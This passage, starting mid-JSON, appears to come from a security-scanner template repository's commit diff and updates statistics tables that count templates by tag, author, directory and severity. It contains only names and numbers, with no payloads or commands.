galligan","count":3},{"name":"dr0pd34d","count":3},{"name":"me9187","count":3},{"name":"sushantkamble","count":3},{"name":"randomrobbie","count":3},{"name":"huta0","count":3},{"name":"hahwul","count":3},{"name":"vsh00t","count":3},{"name":"taielab","count":3},{"name":"cheesymoon","count":3},{"name":"0w4ys","count":3},{"name":"parth","count":3},{"name":"_generic_human_","count":3},{"name":"andydoering","count":3},{"name":"emenalf","count":3},{"name":"shifacyclewala","count":3},{"name":"alifathi-h1","count":3},{"name":"fxploit","count":3},{"name":"badboycxcc","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"atomiczsec","count":3},{"name":"arcc","count":3},{"name":"mavericknerd","count":3},{"name":"ambassify","count":3},{"name":"lark-lab","count":3},{"name":"dudez","count":3},{"name":"huowuzhao","count":3},{"name":"binaryfigments","count":3},{"name":"imjust0","count":3},{"name":"fyoorer","count":3},{"name":"vagnerd","count":3},{"name":"m4lwhere","count":3},{"name":"jarijaas","count":3},{"name":"johnjhacking","count":3},{"name":"ekrause","count":3},{"name":"lucasljm2001","count":3},{"name":"z3bd","count":3},{"name":"swissky","count":3},{"name":"f1tz","count":3},{"name":"nybble04","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"davidmckennirey","count":3},{"name":"splint3r7","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"ph33r","count":3},{"name":"skeltavik","count":3},{"name":"unstabl3","count":3},{"name":"whoever","count":3},{"name":"true13","count":3},{"name":"evergreencartoons","count":3},{"name":"moritz nentwig","count":2},{"name":"thezakman","count":2},{"name":"nkxxkn","count":2},{"name":"notnotnotveg","count":2},{"name":"github.com/its0x08","count":2},{"name":"cckuakilong","count":2},{"name":"z0ne","count":2},{"name":"sinkettu","count":2},{"name":"dogancanbakir","count":2},{"name":"kishore-hariram","count":2},{"name":"ree4pwn","count":2},{"name":"cocxanh","count":2},{"name":"j3ssie","count":2},{"name":"udit_thakkur","count":2},{"name":"amsda","count":2},{"name":"n-thumann","count":2},{"name":"martincodes-de","count":2},{"name":"x1m_martijn","count":2},{"name":"hackerarpan","count":2},{"name":"myztique","count":2},{"name":"w4cky_","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"bp0lr","count":2},{"name":"e1a","count":2},{"name":"vavkamil","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"bing0o","count":2},{"name":"bananabr","count":2},{"name":"nvn1729","count":2},{"name":"danielmofer","count":2},{"name":"joshua rogers","count":2},{"name":"8arthur","count":2},{"name":"gal nagli","count":2},{"name":"g4l1t0","count":2},{"name":"thardt-praetorian","count":2},{"name":"smaranchand","count":2},{"name":"korteke","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"d4vy","count":2},{"name":"sbani","count":2},{"name":"wa1tf0rme","count":2},{"name":"0xrudra","count":2},{"name":"raesene","count":2},{"name":"ayadim","count":2},{"name":"0xsmiley","count":2},{"name":"ep1csage","count":2},{"name":"shelled","count":2},{"name":"y4er","count":2},{"name":"ehsahil","count":2},{"name":"joeldeleep","count":2},{"name":"666asd","count":2},{"name":"foulenzer","count":2},{"name":"sascha brendel","count":2},{"name":"streetofhackerr007","count":2},{"name":"brenocss","count":2},{"name":"mohammedsaneem","count":2},{"name":"convisoappsec","count":2},{"name":"redteambrasil","count":2},{"name":"k11h-de","count":2},{"name":"randomdhiraj","count":2},{"name":"brucelsone","count":2},{"name":"hetroublemakr","count":2},{"name":"socketz","count":2},{"name":"coldfish","count":2},{"name":"nuk3s3c","count":2},{"name":"sy3omda","count":2},{"name":"afaq","count":2},{"name":"pxmme1337","count":2},{"name":"gevakun","count":2},{"name":"codexlynx","count":2},{"name":"dahse89","count":2},{"name":"gtrrnr","count":2},{"name":"c3l3si4n","count":2},{"name":"geekby","count":2},{"name":"maximus decimus","count":2},{"name":"paradessia","count":2},{"name":"rafaelwdornelas","count":2},{"name":"kre80r","count":2},{"name":"dbrwsky","count":2},{"name":"0xnirvana","count":2},{"name":"uomogrande","count":2},{"name":"manas_harsh","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"koti2","count":2},{"name":"luci","count":2},{"name":"bsysop","count":2},{"name":"heeress","count":2},{"name":"ajaysenr","count":2},{"name":"kiblyn11","count":2},{"name":"joshlarsen","count":2},{"name":"lotusdll","count":2},{"name":"v0idc0de","count":2},{"name":"0xelkomy","count":2},{"name":"0xprial","count":2},{"name":"0xsapra","count":2},{"name":"paperpen","count":2},{"name":"clarkvoss","count":2},{"name":"dheerajmadhukar","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"supras","count":2},{"name":"affix","count":1},{"name":"co0nan","count":1},{"name":"francescocarlucci","count":1},{"name":"arliya","count":1},{"name":"lamscun","count":1},{"name":"absshax","count":1},{"name":"tim_koopmans","count":1},{"name":"unp4ck","count":1},{"name":"shiva (strobes security)","count":1},{"name":"jc175","count":1},{"name":"danigoland","count":1},{"name":"wabafet","count":1},{"name":"yuansec","count":1},{"name":"bad5ect0r","count":1},{"name":"lixts","count":1},{"name":"vzamanillo","count":1},{"name":"nielsing","count":1},{"name":"kagamigawa","count":1},{"name":"viniciuspereiras","count":1},{"name":"0h1in9e","count":1},{"name":"xianke","count":1},{"name":"mr. bobo hp","count":1},{"name":"erethon","count":1},{"name":"pphuahua","count":1},{"name":"cookiehanhoan","count":1},{"name":"shifacyclewla","count":1},{"name":"ok_bye_now","count":1},{"name":"infosecsanyam","count":1},{"name":"mukundbhuva","count":1},{"name":"noah @thesubtlety","count":1},{"name":"patralos","count":1},{"name":"sickwell","count":1},{"name":"ofjaaah","count":1},{"name":"tirtha_mandal","count":1},{"name":"ooooooo_q","count":1},{"name":"ling","count":1},{"name":"osamahamad","count":1},{"name":"justmumu","count":1},{"name":"knassar702","count":1},{"name":"bugvsme","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"undefl0w","count":1},{"name":"esonhugh","count":1},{"name":"ptonewreckin","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"open-sec","count":1},{"name":"manasmbellani","count":1},{"name":"lady_bug","count":1},{"name":"arall","count":1},{"name":"metascan","count":1},{"name":"5up3r541y4n","count":1},{"name":"shivampand3y","count":1},{"name":"pudsec","count":1},{"name":"0xteles","count":1},{"name":"b4uh0lz","count":1},{"name":"rotembar","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"kaizensecurity","count":1},{"name":"jub0bs","count":1},{"name":"flag007","count":1},{"name":"skylark-lab","count":1},{"name":"1nf1n7y","count":1},{"name":"hczdmr","count":1},{"name":"jaimin gondaliya","count":1},{"name":"dk999","count":1},{"name":"th3.d1p4k","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"petergrifin","count":1},{"name":"mayankpandey01","count":1},{"name":"kresec","count":1},{"name":"screamy","count":1},{"name":"gpiechnik2","count":1},{"name":"husain","count":1},{"name":"carlosvieira","count":1},{"name":"nerrorsec","count":1},{"name":"davidfegyver","count":1},{"name":"dhiyaneshdki","count":1},{"name":"ilovebinbash","count":1},{"name":"kabirsuda","count":1},{"name":"mhdsamx","count":1},{"name":"philippdelteil","count":1},{"name":"becivells","count":1},{"name":"jiheon-dev","count":1},{"name":"notsoevilweasel","count":1},{"name":"noamrathaus","count":1},{"name":"aringo","count":1},{"name":"numan türle","count":1},{"name":"dawid-czarnecki","count":1},{"name":"dmartyn","count":1},{"name":"ynnirc","count":1},{"name":"ndmalc","count":1},{"name":"noobexploiter","count":1},{"name":"sak1","count":1},{"name":"regala_","count":1},{"name":"anon-artist","count":1},{"name":"charanrayudu","count":1},{"name":"brabbit10","count":1},{"name":"exceed","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"furkansenan","count":1},{"name":"palanichamy_perumal","count":1},{"name":"rotemreiss","count":1},{"name":"alevsk","count":1},{"name":"bjhulst","count":1},{"name":"ahmed abou-ela","count":1},{"name":"houdinis","count":1},{"name":"pulsesecurity.co.nz","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"berkdusunur","count":1},{"name":"xstp","count":1},{"name":"p-l-","count":1},{"name":"alperenkesk","count":1},{"name":"dievus","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"0xd0ff9","count":1},{"name":"thelicato","count":1},{"name":"dorkerdevil","count":1},{"name":"mah3sec_","count":1},{"name":"f1she3","count":1},{"name":"djoevanka","count":1},{"name":"keni0k","count":1},{"name":"ph33rr","count":1},{"name":"manuelbua","count":1},{"name":"couskito","count":1},{"name":"pascalheidmann","count":1},{"name":"pbuff07","count":1},{"name":"igibanez","count":1},{"name":"opencirt","count":1},{"name":"willd96","count":1},{"name":"zy9ard3","count":1},{"name":"8authur","count":1},{"name":"rschio","count":1},{"name":"guax1","count":1},{"name":"yashanand155","count":1},{"name":"makyotox","count":1},{"name":"millermedia","count":1},{"name":"izn0u","count":1},{"name":"revblock","count":1},{"name":"zinminphy0","count":1},{"name":"failopen","count":1},{"name":"luqmaan hadia","count":1},{"name":"juliosmelo","count":1},{"name":"th3r4id","count":1},{"name":"kiks7","count":1},{"name":"thirukrishnan","count":1},{"name":"b0yd","count":1},{"name":"kurohost","count":1},{"name":"w0tx","count":1},{"name":"fopina","count":1},{"name":"arr0way","count":1},{"name":"schniggie","count":1},{"name":"nobody","count":1},{"name":"jbertman","count":1},{"name":"hakimkt","count":1},{"name":"alex","count":1},{"name":"luisfelipe146","count":1},{"name":"zandros0","count":1},{"name":"xeldax","count":1},{"name":"piyushchhiroliya","count":1},{"name":"phyr3wall","count":1},{"name":"liquidsec","count":1},{"name":"droberson","count":1},{"name":"topscoder","count":1},{"name":"thebinitghimire","count":1},{"name":"jeya seelan","count":1},{"name":"tarunkoyalwar","count":1},{"name":"imhunterand","count":1},{"name":"blckraven","count":1},{"name":"thevillagehacker","count":1},{"name":"qlkwej","count":1},{"name":"matt miller","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"kchason","count":1},{"name":"daffianfo","count":1},{"name":"fq_hsu","count":1},{"name":"michael wedl","count":1},{"name":"prettyboyaaditya","count":1},{"name":"secthebit","count":1},{"name":"rodnt","count":1},{"name":"ramondunker","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"xshuden","count":1},{"name":"y0no","count":1},{"name":"hazana","count":1},{"name":"kailashbohara","count":1},{"name":"sicksec","count":1},{"name":"whynotke","count":1},{"name":"ldionmarcil","count":1},{"name":"pdp","count":1},{"name":"_c0wb0y_","count":1},{"name":"barthy.koeln","count":1},{"name":"elitebaz","count":1},{"name":"fmunozs","count":1},{"name":"x6263","count":1},{"name":"d0rkerdevil","count":1},{"name":"nagli","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"xcapri","count":1},{"name":"ola456","count":1},{"name":"brianlam38","count":1},{"name":"_harleo","count":1},{"name":"akash.c","count":1},{"name":"hakluke","count":1},{"name":"arqsz","count":1},{"name":"chron0x","count":1},{"name":"httpvoid","count":1},{"name":"therealtoastycat","count":1},{"name":"mass0ma","count":1},{"name":"_darrenmartyn","count":1},{"name":"momen eldawakhly","count":1},{"name":"aaban solutions","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"aayush vishnoi","count":1},{"name":"majidmc2","count":1},{"name":"miryangjung","count":1},{"name":"spac3wh1te","count":1},{"name":"mbmy","count":1},{"name":"elder tao","count":1},{"name":"jna1","count":1},{"name":"deena","count":1},{"name":"king-alexander","count":1},{"name":"soyelmago","count":1},{"name":"0ut0fb4nd","count":1},{"name":"compr00t","count":1},{"name":"lark lab","count":1},{"name":"orpheus","count":1},{"name":"ruppde","count":1},{"name":"remonsec","count":1},{"name":"omarjezi","count":1},{"name":"jonathanwalker","count":1},{"name":"mantissts","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"arjunchandarana","count":1},{"name":"stupidfish","count":1},{"name":"akokonunes","count":1},{"name":"mabdullah22","count":1},{"name":"zeyad azima","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ohlinge","count":1},{"name":"aresx","count":1},{"name":"andirrahmani1","count":1},{"name":"act1on3","count":1},{"name":"oscarintherocks","count":1},{"name":"ramkrishna sawant","count":1},{"name":"lethargynavigator","count":1},{"name":"kareemse1im","count":1},{"name":"2rs3c","count":1},{"name":"jas37","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"juicypotato1","count":1},{"name":"af001","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"myst7ic","count":1},{"name":"0xrod","count":1},{"name":"dabla","count":1},{"name":"apt-mirror","count":1},{"name":"pry0cc","count":1},{"name":"rojanrijal","count":1},{"name":"hateshape","count":1},{"name":"jrolf","count":1},{"name":"0xceeb","count":1},{"name":"evolutionsec","count":1},{"name":"iphantasmic","count":1},{"name":"colbyjack1134","count":1},{"name":"irshadahamed","count":1},{"name":"shiar","count":1},{"name":"bywalks","count":1},{"name":"mesaglio","count":1},{"name":"evan rubinstien","count":1},{"name":"naglis","count":1},{"name":"borna nematzadeh","count":1},{"name":"adrianmf","count":1},{"name":"shreyapohekar","count":1},{"name":"jaskaran","count":1},{"name":"adnanekhan","count":1},{"name":"tirtha","count":1},{"name":"booboohq","count":1},{"name":"exploitation","count":1},{"name":"dali","count":1},{"name":"official_blackhat13","count":1},{"name":"professorabhay","count":1},{"name":"petruknisme","count":1},{"name":"gboddin","count":1},{"name":"hardik-rathod","count":1},{"name":"c4sper0","count":1},{"name":"tehtbl","count":1},{"name":"mrcl0wnlab","count":1},{"name":"lucky0x0d","count":1},{"name":"elmahdi","count":1},{"name":"harshinsecurity","count":1},{"name":"paper-pen","count":1},{"name":"s1r1u5_","count":1},{"name":"sherlocksecurity","count":1},{"name":"0xh7ml","count":1},{"name":"amanrawat","count":1},{"name":"kr1shna4garwal","count":1},{"name":"pratik khalane","count":1},{"name":"rubina119","count":1},{"name":"sec_hawk","count":1},{"name":"r3nz0","count":1},{"name":"miroslavsotak","count":1},{"name":"natto97","count":1},{"name":"zhenwarx","count":1},{"name":"vinit989","count":1},{"name":"carrot2","count":1},{"name":"intx0x80","count":1},{"name":"qianbenhyu","count":1},{"name":"yashgoti","count":1},{"name":"sshell","count":1},{"name":"jbaines-r7","count":1},{"name":"freakyclown","count":1},{"name":"amnotacat","count":1},{"name":"ipanda","count":1},{"name":"micha3lb3n","count":1},{"name":"iampritam","count":1},{"name":"daviey","count":1},{"name":"aron molnar","count":1},{"name":"hanlaomo","count":1},{"name":"j33n1k4","count":1},{"name":"nytr0gen","count":1},{"name":"push4d","count":1},{"name":"hexcat","count":1},{"name":"mrharshvardhan","count":1},{"name":"unkl4b","count":1},{"name":"marcos_iaf","count":1},{"name":"vikas kundu","count":1},{"name":"pussycat0","count":1},{"name":"wlayzz","count":1},{"name":"farish","count":1},{"name":"b0rn2r00t","count":1},{"name":"dale clarke","count":1},{"name":"shockwave","count":1},{"name":"mariam tariq","count":1},{"name":"aringo-bf","count":1},{"name":"narluin","count":1},{"name":"jeya.seelan","count":1},{"name":"mihhailsokolov","count":1},{"name":"supr4s","count":1},{"name":"marcio mendes","count":1},{"name":"jcockhren","count":1},{"name":"galoget","count":1},{"name":"ransomsec","count":1},{"name":"shelld3v","count":1},{"name":"omarkurt","count":1},{"name":"patrick pirker","count":1},{"name":"jteles","count":1},{"name":"ayadi","count":1},{"name":"parzival","count":1},{"name":"pjborah","count":1},{"name":"allenwest24","count":1},{"name":"h4kux","count":1},{"name":"luskabol","count":1},{"name":"0xceba","count":1},{"name":"alexrydzak","count":1},{"name":"yavolo","count":1},{"name":"higor melgaço","count":1},{"name":"aaronchen0","count":1},{"name":"ringo","count":1},{"name":"bartu utku sarp","count":1},{"name":"caon","count":1},{"name":"ahmetpergamum","count":1},{"name":"lingtren","count":1},{"name":"0xtavian","count":1},{"name":"elouhi","count":1},{"name":"andreluna","count":1},{"name":"chesterblue","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"breno_css","count":1},{"name":"aravind","count":1},{"name":"pepitoh","count":1},{"name":"retr02332","count":1},{"name":"udinchan","count":1},{"name":"udyz","count":1},{"name":"exid","count":1},{"name":"viondexd","count":1},{"name":"mubassirpatel","count":1},{"name":"zsusac","count":1},{"name":"none","count":1},{"name":"luqman","count":1},{"name":"kiransau","count":1},{"name":"am0nt31r0","count":1},{"name":"queencitycyber","count":1},{"name":"ahmed sherif","count":1},{"name":"toufik-airane","count":1},{"name":"bughuntersurya","count":1},{"name":"dwbzn","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"lrtk-coder","count":1},{"name":"calumjelrick","count":1},{"name":"realexp3rt","count":1},{"name":"akshansh","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"tea","count":1},{"name":"mzack9999","count":1},{"name":"rivalsec","count":1},{"name":"geraldino2","count":1},{"name":"retr0","count":1},{"name":"un-fmunozs","count":1},{"name":"nuts7","count":1},{"name":"furkansayim","count":1},{"name":"duty_1g","count":1},{"name":"sinsinology","count":1},{"name":"andysvints","count":1},{"name":"florianmaak","count":1},{"name":"clment cruchet","count":1}],"directory":[{"name":"http","count":6342},{"name":"file","count":309},{"name":"workflows","count":191},{"name":"network","count":116},{"name":"ssl","count":26},{"name":"dns","count":17},{"name":"headless","count":9},{"name":"TEMPLATES-STATS.json","count":1},{"name":"contributors.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":3217},{"name":"high","count":1288},{"name":"medium","count":1270},{"name":"critical","count":785},{"name":"low","count":230},{"name":"unknown","count":29}],"types":[{"name":"file","count":309},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index b4261e8500..aba5c36de7 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,3663 +1,3696 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2033 | dhiyaneshdk | 1053 | http | 6290 | info | 3199 | file | 309 | -| panel | 980 | dwisiswant0 | 798 | file | 309 | high | 1283 | dns | 17 | -| wordpress | 827 | daffainfo | 787 | workflows | 190 | medium | 1261 | | | -| exposure | 781 | pikpikcu | 353 | network | 116 | critical | 765 | | | -| xss | 720 | pussycat0x | 288 | ssl | 25 | low | 229 | | | -| wp-plugin | 717 | pdteam | 282 | dns | 17 | unknown | 29 | | | -| osint | 669 | ritikchaddha | 247 | headless | 9 | | | | | -| tech | 627 | geeknik | 221 | cves.json | 1 | | | | | -| edb | 598 | ricardomaia | 221 | TEMPLATES-STATS.json | 1 | | | | | -| lfi | 585 | theamanrawat | 179 | contributors.json | 1 | | | | | -| misconfig | 505 | 0x_akoko | 179 | | | | | | | -| rce | 457 | princechaddha | 157 | | | | | | | -| cve2021 | 441 | gy741 | 147 | | | | | | | -| cve2022 | 429 | arafatansari | 119 | | | | | | | -| packetstorm | 429 | tess | 109 | | | | | | | -| wpscan | 377 | r3y3r53 | 80 | | | | | | | -| wp | 329 | madrobot | 65 | | | | | | | +| cve | 2054 | dhiyaneshdk | 1056 | http | 6342 | info | 3217 | file | 309 | +| panel | 985 | dwisiswant0 | 798 | file | 309 | high | 1288 | dns | 17 | +| wordpress | 831 | daffainfo | 787 | workflows | 191 | medium | 1270 | | | +| exposure | 784 | pikpikcu | 353 | network | 116 | critical | 785 | | | +| xss | 726 | pussycat0x | 289 | ssl | 26 | low | 230 | | | +| wp-plugin | 721 | pdteam | 283 | dns | 17 | unknown | 29 | | | +| osint | 672 | ritikchaddha | 259 | headless | 9 | | | | | +| tech | 632 | ricardomaia | 225 | TEMPLATES-STATS.json | 1 | | | | | +| edb | 598 | geeknik | 221 | cves.json | 1 | | | | | +| lfi | 587 | theamanrawat | 179 | contributors.json | 1 | | | | | +| misconfig | 509 | 0x_akoko | 179 | | | | | | | +| rce | 467 | princechaddha | 161 | | | | | | | +| packetstorm | 446 | gy741 | 147 | | | | | | | +| cve2021 | 442 | arafatansari | 119 | | | | | | | +| cve2022 | 430 | tess | 109 | | | | | | | +| wpscan | 382 | r3y3r53 | 80 | | | | | | | +| wp | 330 | madrobot | 65 | | | | | | | | file | 318 | zzeitlin | 64 | | | | | | | -| unauth | 291 | idealphase | 63 | | | | | | | -| authenticated | 252 | akincibor | 58 | | | | | | | -| cve2020 | 246 | for3stco1d | 55 | | | | | | | -| token-spray | 240 | pdresearch | 47 | | | | | | | -| sqli | 225 | gaurang | 42 | | | | | | | -| kev | 213 | righettod | 42 | | | | | | | -| osint-social | 210 | philippedelteil | 41 | | | | | | | -| top-200 | 209 | edoardottt | 41 | | | | | | | -| config | 200 | iamnoooob | 36 | | | | | | | -| | 194 | c-sh0 | 35 | | | | | | | -| token | 193 | rootxharsh | 33 | | | | | | | -| oast | 178 | adam crosser | 31 | | | | | | | -| default-login | 161 | j4vaovo | 28 | | | | | | | -| cve2023 | 160 | ice3man | 26 | | | | | | | -| intrusive | 159 | johnk3r | 25 | | | | | | | +| unauth | 297 | idealphase | 63 | | | | | | | +| authenticated | 253 | akincibor | 58 | | | | | | | +| cve2020 | 248 | for3stco1d | 55 | | | | | | | +| token-spray | 241 | pdresearch | 48 | | | | | | | +| sqli | 233 | righettod | 46 | | | | | | | +| kev | 217 | gaurang | 42 | | | | | | | +| top-200 | 212 | philippedelteil | 42 | | | | | | | +| osint-social | 210 | edoardottt | 41 | | | | | | | +| config | 200 | iamnoooob | 37 | | | | | | | +| | 195 | c-sh0 | 35 | | | | | | | +| token | 193 | rootxharsh | 34 | | | | | | | +| oast | 183 | sleepingbag945 | 33 | | | | | | | +| cve2023 | 174 | j4vaovo | 31 | | | | | | | +| intrusive | 169 | adam crosser | 31 | | | | | | | +| login | 162 | ice3man | 26 | | | | | | | +| default-login | 161 | johnk3r | 26 | | | | | | | | iot | 159 | pwnhxl | 25 | | | | | | | -| apache | 157 | sleepingbag945 | 24 | | | | | | | -| login | 156 | hardik-solanki | 24 | | | | | | | -| cve2019 | 156 | organiccrap | 24 | | | | | | | -| cve2018 | 155 | techbrunchfr | 23 | | | | | | | -| joomla | 137 | ffffffff0x | 22 | | | | | | | -| malware | 130 | harsh | 22 | | | | | | | +| cve2018 | 157 | organiccrap | 24 | | | | | | | +| apache | 157 | hardik-solanki | 24 | | | | | | | +| cve2019 | 156 | techbrunchfr | 23 | | | | | | | +| joomla | 137 | harsh | 22 | | | | | | | +| malware | 131 | ffffffff0x | 22 | | | | | | | | redirect | 118 | ctflearner | 19 | | | | | | | +| detect | 116 | sullo | 18 | | | | | | | | cve2010 | 112 | cckuailong | 18 | | | | | | | -| detect | 112 | sullo | 18 | | | | | | | | network | 105 | parthmalhotra | 17 | | | | | | | -| files | 103 | lu4nx | 16 | | | | | | | -| top-100 | 100 | random-robbie | 16 | | | | | | | -| ssrf | 100 | pr3r00t | 15 | | | | | | | -| router | 99 | sheikhrishad | 15 | | | | | | | -| cms | 98 | r3dg33k | 14 | | | | | | | -| auth-bypass | 96 | milo2012 | 14 | | | | | | | -| cve2017 | 80 | tenbird | 14 | | | | | | | +| files | 104 | lu4nx | 16 | | | | | | | +| ssrf | 101 | random-robbie | 16 | | | | | | | +| top-100 | 100 | pr3r00t | 15 | | | | | | | +| auth-bypass | 99 | sheikhrishad | 15 | | | | | | | +| router | 99 | milo2012 | 14 | | | | | | | +| cms | 98 | tenbird | 14 | | | | | | | +| cve2017 | 80 | r3dg33k | 14 | | | | | | | | disclosure | 78 | 0ri2n | 13 | | | | | | | -| devops | 77 | sharath | 13 | | | | | | | -| takeover | 74 | melbadry9 | 13 | | | | | | | -| install | 72 | nullfuzz | 13 | | | | | | | -| seclists | 69 | theabhinavgaur | 13 | | | | | | | -| oracle | 66 | dogasantos | 12 | | | | | | | -| oss | 61 | suman_kar | 12 | | | | | | | -| adobe | 55 | cyllective | 11 | | | | | | | -| cisco | 55 | wdahlenb | 11 | | | | | | | -| cve2015 | 55 | elsfa7110 | 11 | | | | | | | -| cve2016 | 53 | alph4byt3 | 10 | | | | | | | -| google | 53 | hackergautam | 10 | | | | | | | -| tokens | 52 | random_robbie | 10 | | | | | | | -| fileupload | 52 | 0xpugazh | 10 | | | | | | | -| atlassian | 48 | co5mos | 10 | | | | | | | -| tenable | 46 | meme-lord | 10 | | | | | | | -| logs | 46 | nadino | 10 | | | | | | | -| huntr | 45 | logicalhunter | 10 | | | | | | | -| vmware | 45 | momika233 | 9 | | | | | | | -| osint-gaming | 45 | fabaff | 9 | | | | | | | -| debug | 44 | olearycrew | 9 | | | | | | | -| vulhub | 44 | emadshanab | 9 | | | | | | | -| aem | 44 | 0x240x23elu | 9 | | | | | | | -| hackerone | 43 | oppsec | 9 | | | | | | | -| cve2014 | 42 | veshraj | 8 | | | | | | | -| plugin | 42 | irshad ahamed | 8 | | | | | | | -| osint-hobby | 42 | aashiq | 8 | | | | | | | -| osint-porn | 42 | iamthefrogy | 8 | | | | | | | -| c2 | 41 | _0xf4n9x_ | 8 | | | | | | | -| generic | 41 | zh | 8 | | | | | | | +| devops | 77 | nullfuzz | 13 | | | | | | | +| takeover | 75 | theabhinavgaur | 13 | | | | | | | +| install | 72 | sharath | 13 | | | | | | | +| seclists | 70 | melbadry9 | 13 | | | | | | | +| oracle | 66 | suman_kar | 12 | | | | | | | +| oss | 61 | dogasantos | 12 | | | | | | | +| fileupload | 56 | wdahlenb | 11 | | | | | | | +| cisco | 56 | 0xpugazh | 11 | | | | | | | +| cve2015 | 55 | cyllective | 11 | | | | | | | +| adobe | 55 | elsfa7110 | 11 | | | | | | | +| cve2016 | 54 | logicalhunter | 10 | | | | | | | +| google | 53 | nadino | 10 | | | | | | | +| tokens | 52 | meme-lord | 10 | | | | | | | +| atlassian | 48 | hackergautam | 10 | | | | | | | +| logs | 46 | random_robbie | 10 | | | | | | | +| tenable | 46 | alph4byt3 | 10 | | | | | | | +| huntr | 45 | co5mos | 10 | | | | | | | +| osint-gaming | 45 | olearycrew | 9 | | | | | | | +| vmware | 45 | oppsec | 9 | | | | | | | +| vulhub | 44 | 0x240x23elu | 9 | | | | | | | +| aem | 44 | emadshanab | 9 | | | | | | | +| debug | 44 | momika233 | 9 | | | | | | | +| hackerone | 43 | fabaff | 9 | | | | | | | +| plugin | 42 | veshraj | 8 | | | | | | | +| cve2014 | 42 | irshad ahamed | 8 | | | | | | | +| osint-hobby | 42 | zh | 8 | | | | | | | +| c2 | 42 | _0xf4n9x_ | 8 | | | | | | | +| osint-porn | 42 | aashiq | 8 | | | | | | | +| generic | 41 | iamthefrogy | 8 | | | | | | | | springboot | 38 | that_juan_ | 8 | | | | | | | -| traversal | 37 | adamcrosser | 7 | | | | | | | -| jira | 36 | dr_set | 7 | | | | | | | -| listing | 35 | harshbothra_ | 7 | | | | | | | -| kubernetes | 35 | me_dheeraj | 7 | | | | | | | -| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| osint-misc | 35 | amit-jd | 7 | | | | | | | -| aws | 35 | leovalcante | 7 | | | | | | | -| injection | 34 | techryptic (@tech) | 7 | | | | | | | -| misc | 33 | caspergn | 7 | | | | | | | -| cnvd | 33 | randomstr1ng | 7 | | | | | | | +| traversal | 37 | mastercho | 8 | | | | | | | +| jira | 36 | kophjager007 | 7 | | | | | | | +| listing | 35 | randomstr1ng | 7 | | | | | | | +| injection | 35 | noraj | 7 | | | | | | | +| misc | 35 | divya_mudgal | 7 | | | | | | | +| osint-misc | 35 | techryptic (@tech) | 7 | | | | | | | +| kubernetes | 35 | dr_set | 7 | | | | | | | +| aws | 35 | harshbothra_ | 7 | | | | | | | +| cnvd | 34 | leovalcante | 7 | | | | | | | +| ir | 33 | adamcrosser | 7 | | | | | | | | deserialization | 32 | its0x08 | 7 | | | | | | | -| ir | 32 | kophjager007 | 7 | | | | | | | -| log4j | 29 | divya_mudgal | 7 | | | | | | | -| osint-coding | 29 | evan rubinstein | 6 | | | | | | | -| sap | 29 | xelkomy | 6 | | | | | | | -| fuzz | 28 | gitlab red team | 6 | | | | | | | -| osint-tech | 28 | __fazal | 6 | | | | | | | -| php | 27 | noraj | 6 | | | | | | | +| osint-coding | 30 | me_dheeraj | 7 | | | | | | | +| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | +| php | 29 | amit-jd | 7 | | | | | | | +| sap | 29 | caspergn | 7 | | | | | | | +| log4j | 29 | puzzlepeaches | 6 | | | | | | | +| fuzz | 28 | nodauf | 6 | | | | | | | +| osint-tech | 28 | pentest_swissky | 6 | | | | | | | | gitlab | 27 | pathtaga | 6 | | | | | | | -| cve2012 | 26 | puzzlepeaches | 6 | | | | | | | -| microsoft | 26 | clem9669 | 6 | | | | | | | -| api | 26 | nodauf | 6 | | | | | | | -| jndi | 26 | pentest_swissky | 6 | | | | | | | -| proxy | 26 | praetorian-thendrickson | 6 | | | | | | | -| k8s | 25 | devang-solanki | 6 | | | | | | | -| osint-business | 24 | justaacat | 6 | | | | | | | -| osint-shopping | 24 | imnightmaree | 6 | | | | | | | -| firewall | 24 | forgedhallpass | 6 | | | | | | | -| osint-finance | 24 | ja1sh | 6 | | | | | | | -| osint-images | 24 | mr-xn | 5 | | | | | | | -| manageengine | 24 | kh4sh3i | 5 | | | | | | | -| stored-xss | 23 | vicrack | 5 | | | | | | | -| zoho | 23 | r12w4n | 5 | | | | | | | -| amazon | 23 | bhutch | 5 | | | | | | | -| wp-theme | 23 | defr0ggy | 5 | | | | | | | -| keys | 22 | prajiteshsingh | 5 | | | | | | | -| ibm | 21 | kazet | 5 | | | | | | | -| weblogic | 21 | panch0r3d | 5 | | | | 